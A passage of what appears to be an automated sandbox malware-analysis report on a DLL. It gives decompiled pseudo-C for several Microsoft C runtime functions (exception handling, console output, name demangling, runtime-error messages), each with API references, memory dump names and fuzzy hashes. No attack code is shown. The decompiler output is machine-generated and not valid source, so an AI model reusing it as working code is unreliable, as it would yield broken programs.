				E10002FF9( &_v104, _v80);
				E10004C0B( &_v104, 0x1004ae88);
				asm("int3");
				_push(_t45 - 0xc);
				E10003042( &_v132, _v112);
				E10004C0B( &_v132, 0x1004ae34);
				asm("int3");
				return "bad function call";
			}

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003388

Part of subcall function 10002F08: std::exception::exception.LIBCONCRT ref: 10002F15

Part of subcall function 10004C0B: RaiseException.KERNEL32(E06D7363,00000001,00000003,10003CFA,?,?,?,10003CFA,?,1004AC7C), ref: 10004C6B

std::invalid_argument::invalid_argument.LIBCONCRT ref: 100033A8

Part of subcall function 10002F7C: std::exception::exception.LIBCONCRT ref: 10002F89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 100033C8

Part of subcall function 10002FB6: std::exception::exception.LIBCONCRT ref: 10002FC3

std::regex_error::regex_error.LIBCPMT ref: 100033E8

Part of subcall function 10002FF9: std::exception::exception.LIBCONCRT ref: 10003011

std::invalid_argument::invalid_argument.LIBCONCRT ref: 10003408

Part of subcall function 10003042: std::exception::exception.LIBCONCRT ref: 1000304F

Strings

bad function call, xrefs: 1000341C

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: std::exception::exception$std::invalid_argument::invalid_argument$ExceptionRaisestd::regex_error::regex_error
String ID: bad function call
API String ID: 2470674941-3612616537
Opcode ID: 346c17465034ca6be7bf942654ed0d14118ffd4f0e314fec286e0fdce0ccf1d8
Instruction ID: 9a04ec3b8265f418b22985a109fb5f94b6ecf92577c3c0eff2a7a32c9cb980e7
Opcode Fuzzy Hash: 346c17465034ca6be7bf942654ed0d14118ffd4f0e314fec286e0fdce0ccf1d8
Instruction Fuzzy Hash: 3E11B77DC0410CBBEB04EAE4DC46CDD777DEF04180F904474BA2592456FB74BA5986D9

Uniqueness

Uniqueness Score: -1.00%

Function 100015F8, Relevance: 10.6, APIs: 7, Instructions: 54
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100015F8(void* __ecx, struct HWND__* _a4, int _a12, int _a16) {
				int _v8;
				int _v12;
				intOrPtr _t20;
				intOrPtr _t33;
				void* _t35;
				struct HDC__* _t40;

				if((GetMenuState(GetSubMenu(GetMenu(_a4), 1), 0xcb, 0) & 0x00000008) != 0 &&  *0x1004dc34 != 0) {
					_t33 =  *0x1004dc38; // 0x3a3cc0
					_t4 = _t33 + 4; // 0x3a3cc0
					_t20 =  *_t4;
					_t5 = _t20 + 8; // 0x0
					_t6 = _t20 + 0xc; // 0x0
					_v12 = _a12;
					_v8 = _a16;
					_push( &_v12);
					E10001102(_t35, _t33);
					_t40 = GetDC(_a4);
					MoveToEx(_t40,  *_t5,  *_t6, 0);
					LineTo(_t40, _v12, _v8);
					ReleaseDC(_a4, _t40);
				}
				return 0;
			}

0x1000161f
0x1000162a
0x10001633
0x10001633
0x10001636
0x10001639
0x1000163f
0x10001645
0x1000164b
0x10001652
0x10001663
0x10001667
0x10001674
0x1000167e
0x10001686
0x1000168a

APIs

GetMenu.USER32 ref: 10001600
GetSubMenu.USER32 ref: 10001609
GetMenuState.USER32(00000000,000000CB,00000000), ref: 10001617

Part of subcall function 10001102: _Deallocate.LIBCONCRT ref: 1000113A

GetDC.USER32(?), ref: 1000165A
MoveToEx.GDI32(00000000,00000000,00000000,00000000), ref: 10001667
LineTo.GDI32(00000000,?,?), ref: 10001674
ReleaseDC.USER32(?,00000000), ref: 1000167E

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Menu$DeallocateLineMoveReleaseState
String ID:
API String ID: 2409786466-0
Opcode ID: cc2ffc255833c7d3ac322484387a127a9cde758bc41a67db7cc1ddba23590c15
Instruction ID: b7c906b1751459d05ed15d7226b6fca836a6211401a0122071cd1be87b3306df
Opcode Fuzzy Hash: cc2ffc255833c7d3ac322484387a127a9cde758bc41a67db7cc1ddba23590c15
Instruction Fuzzy Hash: 86115E75600118BFEB019FA4CE89FDA7FB9EF0A395F158055FA01D6160C7B19D40CB64

Uniqueness

Uniqueness Score: -1.00%

Function 1003265D, Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E1003265D(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				long _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebp;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				struct _OVERLAPPED* _t241;
				signed int _t243;
				intOrPtr _t246;
				signed int _t249;
				signed int _t250;
				signed int _t252;
				intOrPtr _t254;
				void* _t260;
				intOrPtr _t261;
				signed int _t262;
				signed char _t265;
				intOrPtr _t268;
				signed char* _t270;
				signed int _t273;
				signed int _t274;
				signed int _t278;
				signed int _t279;
				intOrPtr _t280;
				signed int _t281;
				struct _OVERLAPPED* _t283;
				struct _OVERLAPPED* _t285;
				signed int _t286;
				void* _t287;
				void* _t288;

				_t170 =  *0x1004d054; // 0xda1f8931
				_v8 = _t170 ^ _t286;
				_t172 = _a8;
				_t265 = _t172 >> 6;
				_t243 = (_t172 & 0x0000003f) * 0x38;
				_t270 = _a12;
				_v108 = _t270;
				_v80 = _t265;
				_v112 =  *((intOrPtr*)(_t243 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x18));
				_v44 = _t243;
				_v96 = _a16 + _t270;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E1000F794( &_v72, _t265, 0);
				_t274 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t246 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t246;
				_v104 = _t270;
				if(_t270 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t249 = _v44;
						_v51 =  *_t270;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x1004e628 + _v80 * 4));
						_v48 = _t186;
						if(_t246 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t268 = _v48 + 0x2e + _t249;
						_v116 = _t268;
						while( *((intOrPtr*)(_t268 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t265 = _v96 - _t270;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t270 & 0x000000ff) + 0x1004d7f0; // 0x0
							_t254 =  *_t72 + 1;
							_v48 = _t254;
							__eflags = _t254 - _t265;
							if(_t254 > _t265) {
								__eflags = _t265;
								if(_t265 <= 0) {
									goto L40;
								} else {
									_t279 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x1004e628 + _v80 * 4)) + _t279 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t270));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t265;
									} while (_t241 < _t265);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t254 - 4;
								_v140 = _t241;
								_v56 = _t270;
								_v40 = (_t254 == 4) + 1;
								_t220 = E1003356D( &_v144,  &_v76,  &_v56, (_t254 == 4) + 1,  &_v144);
								_t288 = _t287 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t280 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t249 + _v48 + 0x2e) & 0x000000ff) + 0x1004d7f0)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t265) {
								__eflags = _t265;
								if(_t265 > 0) {
									_t281 = _t249;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t270));
										_t260 =  *((intOrPtr*)(0x1004e628 + _v80 * 4)) + _t281 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t260 + _v40 + 0x2e)) = _t227;
										_t281 = _v44;
										__eflags = _t241 - _t265;
									} while (_t241 < _t265);
									L39:
									_t274 = _v88;
								}
								L40:
								_t278 = _t274 + _t265;
								__eflags = _t278;
								L41:
								__eflags = _v60;
								_v88 = _t278;
							} else {
								_t265 = _v40;
								_t283 = _t241;
								_t261 = _v116;
								do {
									 *((char*)(_t286 + _t283 - 0xc)) =  *((intOrPtr*)(_t261 + _t283));
									_t283 =  &(_t283->Internal);
								} while (_t283 < _t265);
								_t284 = _v48;
								_t262 = _v44;
								if(_v48 > 0) {
									E100045C0( &_v16 + _t265, _t270, _t284);
									_t262 = _v44;
									_t287 = _t287 + 0xc;
									_t265 = _v40;
								}
								_t273 = _v80;
								_t285 = _t241;
								do {
									 *( *((intOrPtr*)(0x1004e628 + _t273 * 4)) + _t262 + _t285 + 0x2e) = _t241;
									_t285 =  &(_t285->Internal);
								} while (_t285 < _t265);
								_t270 = _v104;
								_t280 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E1003356D( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t288 = _t287 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t270 = _t270 - 1 + _t280;
									L27:
									_t270 =  &(_t270[1]);
									_v104 = _t270;
									_t193 = E10028BDD(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t287 = _t288 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t274 = _v84 - _v108 + _t270;
											_v88 = _t274;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t270 >= _v96) {
														goto L48;
													} else {
														_t246 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t274 = _t274 + 1;
															_v88 = _t274;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t265 =  *((intOrPtr*)(_t249 + _t186 + 0x2d));
						__eflags = _t265 & 0x00000004;
						if((_t265 & 0x00000004) == 0) {
							_v33 =  *_t270;
							_t188 = E10024262(_t265);
							_t250 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t250 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t250 * 2)) >= _t241) {
								_push(1);
								_push(_t270);
								goto L26;
							} else {
								_t100 =  &(_t270[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t265 = _v80;
									_t252 = _v44;
									 *((char*)(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2e)) = _v33;
									 *(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2d) =  *(_t252 +  *((intOrPtr*)(0x1004e628 + _t265 * 4)) + 0x2d) | 0x00000004;
									_t278 = _t274 + 1;
									goto L41;
								} else {
									_t206 = E1002C39D( &_v76, _t270, 2);
									_t288 = _t287 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t270 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t265 = _t265 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t249 + _t186 + 0x2e));
							_v23 =  *_t270;
							_push(2);
							 *(_t249 + _v48 + 0x2d) = _t265;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E1002C39D();
							_t288 = _t287 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t286;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E100037EA(_a4, _v8 ^ _t286, _t265);
			}

APIs

GetConsoleOutputCP.KERNEL32 ref: 100326A5
__fassign.LIBCMT ref: 1003288A
__fassign.LIBCMT ref: 100328A7
WriteFile.KERNEL32(?,1002B316,00000000,?,00000000), ref: 100328EF
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1003292F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 100329D7

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: ab72a4d4d4db616047fe8542db00a9b766c0f473b3a544cf343a404f0bd2b147
Instruction ID: a8bb8432d5e3edc8eb75f8d90f54bae1a245339a155dc0d31e03c7975ac7510e
Opcode Fuzzy Hash: ab72a4d4d4db616047fe8542db00a9b766c0f473b3a544cf343a404f0bd2b147
Instruction Fuzzy Hash: 91C1AC75D052988FDB12CFA8C980AEDBBF5EF09314F29416AE855FB341D631AD42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000CDCE, Relevance: 9.1, APIs: 6, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CDCE(intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr _t27;
				char* _t29;
				intOrPtr _t38;
				char* _t39;
				void* _t48;
				intOrPtr* _t55;
				intOrPtr* _t65;
				intOrPtr _t67;
				char _t73;
				intOrPtr* _t75;
				void* _t77;
				void* _t78;

				_t55 = _a8;
				_t78 = _t77 - 0x20;
				_t75 = _a4;
				 *_t75 =  *_t55;
				_t27 =  *((intOrPtr*)(_t55 + 4));
				 *((intOrPtr*)(_t75 + 4)) = _t27;
				if(_t27 <= 1) {
					_t29 =  *0x1004e004; // 0x0
					if( *_t29 == 0) {
						E100076A6(E100072DE( &_v36, 1),  &_v12, _t75);
						 *_t75 = _v12;
						 *((intOrPtr*)(_t75 + 4)) = _v8;
					} else {
						E10009A99( &_v12);
						_t65 = E100076A6(E100076C8( &_v12,  &_v20, 0x20),  &_v28, _t75);
						 *_t75 =  *_t65;
						_t38 =  *((intOrPtr*)(_t65 + 4));
						 *((intOrPtr*)(_t75 + 4)) = _t38;
						if(_t38 <= 1) {
							_t39 =  *0x1004e004; // 0x0
							if( *_t39 == 0x40) {
								L19:
								 *0x1004e004 = _t39 + 1;
							} else {
								_v12 = "{for ";
								_v8 = 5;
								while(1) {
									L5:
									E10007748(_t75,  &_v12);
									_t67 =  *((intOrPtr*)(_t75 + 4));
									_t39 =  *0x1004e004; // 0x0
									while(_t67 <= 1) {
										_t73 =  *_t39;
										if(_t73 == 0) {
											L15:
											if( *_t39 == 0) {
												E100078B0(_t75, 1);
											}
											E100077F7(_t75, 0x7d);
											_t39 =  *0x1004e004; // 0x0
										} else {
											if(_t73 == 0x40) {
												if(_t67 <= 1) {
													goto L15;
												}
											} else {
												_t48 = E10007637(_t67,  &_v20, 0x60, E1000B7FB(_t73,  &_v28));
												_t78 = _t78 + 0x10;
												E100077A0(_t75, E100076C8(_t48,  &_v36, 0x27));
												_t39 =  *0x1004e004; // 0x0
												if( *_t39 == 0x40) {
													_t39 = _t39 + 1;
													 *0x1004e004 = _t39;
												}
												_t67 =  *((intOrPtr*)(_t75 + 4));
												if(_t67 <= 1) {
													if( *_t39 == 0x40) {
														continue;
													} else {
														_v12 = "s ";
														_v8 = 2;
														goto L5;
													}
													goto L21;
												}
											}
										}
										break;
									}
									if( *_t39 == 0x40) {
										goto L19;
									}
									goto L21;
								}
							}
						}
					}
				}
				L21:
				return _t75;
			}

APIs

DName::operator+.LIBCMT ref: 1000CE12
DName::operator+.LIBCMT ref: 1000CE1E

Part of subcall function 10007748: shared_ptr.LIBCMT ref: 10007764

DName::operator+=.LIBCMT ref: 1000CEDE

Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000B866
Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000BB24

Part of subcall function 10007637: DName::operator+.LIBCMT ref: 10007658

DName::operator+.LIBCMT ref: 1000CE99

Part of subcall function 100077A0: DName::operator=.LIBVCRUNTIME ref: 100077C1

DName::DName.LIBVCRUNTIME ref: 1000CF02
DName::operator+.LIBCMT ref: 1000CF0E

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator+=Name::operator=shared_ptr
String ID:
API String ID: 2795783184-0
Opcode ID: b3c0250ec6442521a444e263139a1f28894b159fc94599326b5b3a5d3a642c08
Instruction ID: 2463ad79b5e98d84085c04d8798126b1c143ff2480c819560cb4cfdd011bf85e
Opcode Fuzzy Hash: b3c0250ec6442521a444e263139a1f28894b159fc94599326b5b3a5d3a642c08
Instruction Fuzzy Hash: BD41E6B4A04388AFFB10CFA8C995FAE7BEAEB05380F400058F58AE7295D7356D40C759

Uniqueness

Uniqueness Score: -1.00%

Function 1000BBAD, Relevance: 9.1, APIs: 6, Instructions: 95
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E1000BBAD(void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				char _v12;
				char _v20;
				char _v28;
				char _v36;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t37;
				char _t39;
				intOrPtr _t40;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr* _t60;

				_t60 = _a4;
				 *_t60 = 0;
				 *((intOrPtr*)(_t60 + 4)) = 0;
				_t25 = E1000CF24(__edx,  &_v12, 1, 0);
				_t40 =  *_t25;
				 *_t60 = _t40;
				_t26 =  *((intOrPtr*)(_t25 + 4));
				 *((intOrPtr*)(_t60 + 4)) = _t26;
				_t27 =  *0x1004e004; // 0x0
				_t39 = 2;
				if(_t26 != 0) {
					L4:
					_t57 =  *_t27;
					if(_t57 != 0x40) {
						if(_t57 == 0) {
							_push(1);
							if(_t40 != 0) {
								_v12 = "::";
								_v8 = _t39;
								_t30 = E100076A6(E10007684(E100072DE( &_v36),  &_v28,  &_v12),  &_v20, _t60);
								 *_t60 =  *_t30;
								 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t30 + 4));
							} else {
								E10007596(_t60);
							}
						} else {
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *((char*)(_t60 + 4)) = _t39;
							 *_t60 = 0;
						}
						L11:
						return _t60;
					}
					L5:
					 *0x1004e004 = _t27 + 1;
					goto L11;
				}
				_t58 =  *_t27;
				if(_t58 == 0) {
					goto L4;
				}
				if(_t58 == 0x40) {
					goto L5;
				} else {
					_v12 = "::";
					_v8 = _t39;
					_t37 = E100076A6(E10007684(E1000B7FB(_t58,  &_v20),  &_v28,  &_v12),  &_v36, _t60);
					_t40 =  *_t37;
					 *_t60 = _t40;
					 *((intOrPtr*)(_t60 + 4)) =  *((intOrPtr*)(_t37 + 4));
					_t27 =  *0x1004e004; // 0x0
					goto L4;
				}
			}

APIs

Part of subcall function 1000CF24: Replicator::operator[].LIBVCRUNTIME ref: 1000CF61

DName::operator=.LIBVCRUNTIME ref: 1000BC53

Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000B866
Part of subcall function 1000B7FB: DName::operator+.LIBCMT ref: 1000BB24

DName::operator+.LIBCMT ref: 1000BC0E
DName::operator+.LIBCMT ref: 1000BC1A
DName::DName.LIBVCRUNTIME ref: 1000BC67
DName::operator+.LIBCMT ref: 1000BC76
DName::operator+.LIBCMT ref: 1000BC82

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: Name::operator+$NameName::Name::operator=Replicator::operator[]
String ID:
API String ID: 955152517-0
Opcode ID: ba662b15bb985ebfbfb305bd6482890fa435d1f000153196af6ea9912e697c85
Instruction ID: 27af3a92f5b1fd040e2588c0fddfed7d18473ac67e6e21bd44ed062d0c5557d9
Opcode Fuzzy Hash: ba662b15bb985ebfbfb305bd6482890fa435d1f000153196af6ea9912e697c85
Instruction Fuzzy Hash: C031DCB5A00605AFEB18CF98D991DEEBBF9EF59380F00445DE58BA7341DB35AA44CB04

Uniqueness

Uniqueness Score: -1.00%

Function 10005A4B, Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E10005A4B(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x1004d060 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E1000D892(_t13, __eflags,  *0x1004d060);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E1000D8CD(_t14, __eflags,  *0x1004d060, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E10012164();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E1000D8CD(_t18, __eflags,  *0x1004d060, 0);
								} else {
									_t8 = E1000D8CD(_t18, __eflags,  *0x1004d060, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E10011FAC(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

APIs

GetLastError.KERNEL32(00000001,?,1000526E,10003561,10003963,?,10003B9B,?,00000001,?,?,00000001,?,1004AF30,0000000C,10003C9D), ref: 10005A59
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10005A67
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10005A80
SetLastError.KERNEL32(00000000,10003B9B,?,00000001,?,?,00000001,?,1004AF30,0000000C,10003C9D,?,00000001,?), ref: 10005AD2

Memory Dump Source

Source File: 00000008.00000002.2117631466.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000008.00000002.2117616645.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117790773.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.2117826859.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.2117841416.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b498b394295ad5cc3aedbd174fed718b54ab898f492b61d3cd737d6b5173fc23
Instruction ID: 7db28cdefa02e9f84fa3800d6371fd0a77151277f221630a79e8ae18b089995f
Opcode Fuzzy Hash: b498b394295ad5cc3aedbd174fed718b54ab898f492b61d3cd737d6b5173fc23
Instruction Fuzzy Hash: 53012436349322AEF714F7B06CC5A1B3B84EB036F2B20033BF510860E9EF229C119665

Uniqueness

Uniqueness Score: -1.00%

Function 10038FA4, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E10038FA4(void* __ebx, signed short* __edx, void* __esi, void* __eflags, intOrPtr _a4) {
				signed short* _v0;
				signed int _v8;
				signed int _v12;
				char _v13;
				void _v512;
				long _v516;
				void* __edi;
				signed int _t17;
				signed int _t26;
				char* _t31;
				signed short* _t34;
				void* _t35;
				void* _t36;
				signed int _t39;
				signed int _t42;

				_t35 = __esi;
				_t34 = __edx;
				_t39 = _t42;
				if(E1003B6E1(3) == 1 || __eax == 0 &&  *0x1004e888 == 1) {
					_pop(_t39);
					_push(_t39);
					_t40 = _t42;
					_t17 =  *0x1004d054; // 0xda1f8931
					_v8 = _t17 ^ _t42;
					_push(_t35);
					_t36 = GetStdHandle(0xfffffff4);
					if(_t36 != 0 && _t36 != 0xffffffff) {
						_t34 = _v0;
						_t31 =  &_v512;
						while(1) {
							 *_t31 =  *_t34;
							_t31 = _t31 + 1;
							if(_t31 ==  &_v12) {
								break;
							}
							_t26 =  *_t34 & 0x0000ffff;
							_t34 =  &(_t34[1]);
							if(_t26 != 0) {
								continue;
							}
							break;
						}
						_v13 = 0;
						_v516 = 0;
						_t19 = WriteFile(_t36,  &_v512, _t31 -  &_v512 - 1,  &_v516, 0);
					}
					return E100037EA(_t19, _v12 ^ _t40, _t34);
				} else {
					_push(__esi);
					__eax = E10028A30(0x1004e890, 0x314, L"Runtime Error!\n\nProgram: ");
					__ebx = 0;
					if(__eax != 0) {
						L21:
						__eax = E1000E341();
						asm("int3");
						__eax =  *0x1004e888; // 0x0
						return __eax;
					} else {
						_push(__edi);
						__esi = 0x1004e8c2;
						 *0x1004eaca = __ax;
						__eax = GetModuleFileNameW(0, 0x1004e8c2, 0x104);
						__edi = 0x2fb;
						if(__eax != 0 || E10028A30(0x1004e8c2, 0x2fb, L"<program name unknown>") == 0) {
							_t10 = __esi + 2; // 0x1004e8c4
							__ecx = _t10;
							do {
								__ax =  *__esi;
								__esi = __esi + 2;
							} while (__ax != __bx);
							__esi = __esi - __ecx;
							__esi = __esi >> 1;
							_t11 = __esi + 1; // 0x1004e8c1
							__eax = _t11;
							if(_t11 <= 0x3c) {
								L17:
								__edi = 0x314;
								__esi = 0x1004e890;
								if(E1002F999(0x1004e890, 0x314, L"\n\n") != 0) {
									goto L21;
								} else {
									__eax = E1002F999(0x1004e890, 0x314, _a4);
									_pop(__edi);
									if(__eax != 0) {
										goto L21;
									} else {
										_push(L"Microsoft Visual C++ Runtime Library");
										__eax = E1003B8C9(__ecx, 0x1004e890);
										_pop(__esi);
										__ebx = 0x12010;
										_pop(__ebp);
										return __eax;
									}
								}
							} else {
								_push(3);
								_t12 = __esi - 0x3b; // 0x1004e885
								__eax = _t12;
								__edi = __edi - __eax;
								__eax =  &(0x1004e8c2[__eax]);
								if(__eax != 0) {
									goto L21;
								} else {
									goto L17;
								}
							}
						} else {
							goto L21;
						}
					}
				}
			}

APIs

GetModuleFileNameW.KERNEL32(00000000,1004E8C2,00000104), ref: 10039001

Strings

